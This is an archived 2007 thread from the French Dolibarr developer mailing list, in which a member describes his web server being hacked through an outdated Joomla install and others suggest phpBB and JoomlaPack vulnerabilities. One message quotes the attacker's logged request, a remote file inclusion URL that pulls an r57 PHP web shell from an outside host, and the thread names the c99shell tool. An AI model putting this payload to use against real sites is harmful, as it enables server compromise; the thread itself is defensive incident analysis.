[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
RE: [Dolibarr-dev] Dolibarr.org et forum
|
From: |
Vianney ASSOFI |
|
Subject: |
RE: [Dolibarr-dev] Dolibarr.org et forum |
|
Date: |
Wed, 18 Apr 2007 18:34:28 +0200 |
http://www.frsirt.com/bulletins/9992
Titre : JoomlaPack for Joomla "mosConfig_absolute_path" PHP File Inclusion
vulnerability
-----Original Message-----
From: address@hidden
[mailto:address@hidden On Behalf Of
Régis Houssin
Sent: vendredi 13 avril 2007 23:51
To: 'Discussions sur le developpement de Dolibarr'
Subject: RE: [Dolibarr-dev] Dolibarr.org et forum
Merci rodolphe,
En fait je viens de trouver, ca vient de mon site joomla qui n'était pas à
jour et qui émulait le register_global à on grrrrr.
Voici ce qu'ils ont mis :
/components/com_facileforms/facileforms.frame.php?ff_compath=http://tamturk.
by.ru/r57.txt?
Ce que je ne comprends pas c'est comment de r57.txt ca c'est retrouvé en
users.php ?
Régis
-----Message d'origine-----
De : address@hidden
[mailto:address@hidden De
la part de Rodolphe Quiedeville
Envoyé : vendredi 13 avril 2007 22:53
À : Discussions sur le developpement de Dolibarr
Objet : Re: [Dolibarr-dev] Dolibarr.org et forum
Le 13.04.2007 21:48, Régis Houssin a ecrit :
> Bonjour,
>
> Je viens d'être victime d'un piratage sur mon serveur web.
> Le forum et le site de Laurent (dolibarr.org) sont momentanément fermés
afin
> que je règle le problème.
>
> Apparemment les hackers ont utilisé un script php nommé c99shell
>
> Reste à savoir comment ils ont pu le télécharger sur le serveur.
>
> Si vous avez une idée sachant que j'ai des sites en joomla et des forums
en
> phpbb.
phpbb est connu pour être assez vulnérable il y a un lien ici qui parle
de c99shell
http://www.phpbb.com/community/viewtopic.php?f=1&t=396462&p=2164981&hilit=
A++
--
Rodolphe Quiédeville - Artisan Logiciel Libre
http://rodolphe.quiedeville.org/
Travaillons Libre - http://fr.lolix.org/
W 2°56'45'' - N 47°38'20''
_______________________________________________
Dolibarr-dev mailing list
address@hidden
http://lists.nongnu.org/mailman/listinfo/dolibarr-dev
_______________________________________________
Dolibarr-dev mailing list
address@hidden
http://lists.nongnu.org/mailman/listinfo/dolibarr-dev
- [Dolibarr-dev] telephonie, Mathias WOLFF, 2007/04/10
- Re: [Dolibarr-dev] telephonie, Rodolphe Quiedeville, 2007/04/13
- Re: [Dolibarr-dev] telephonie, Mathias WOLFF, 2007/04/13
- Re: [Dolibarr-dev] telephonie, Rodolphe Quiedeville, 2007/04/13
- Re: [Dolibarr-dev] telephonie, Mathias WOLFF, 2007/04/13
- [Dolibarr-dev] Dolibarr.org et forum, Régis Houssin, 2007/04/13
- Re: [Dolibarr-dev] Dolibarr.org et forum, Rodolphe Quiedeville, 2007/04/13
- RE: [Dolibarr-dev] Dolibarr.org et forum, Régis Houssin, 2007/04/13
- RE: [Dolibarr-dev] Dolibarr.org et forum,
Vianney ASSOFI <=
- RE: [Dolibarr-dev] Dolibarr.org et forum, Régis Houssin, 2007/04/20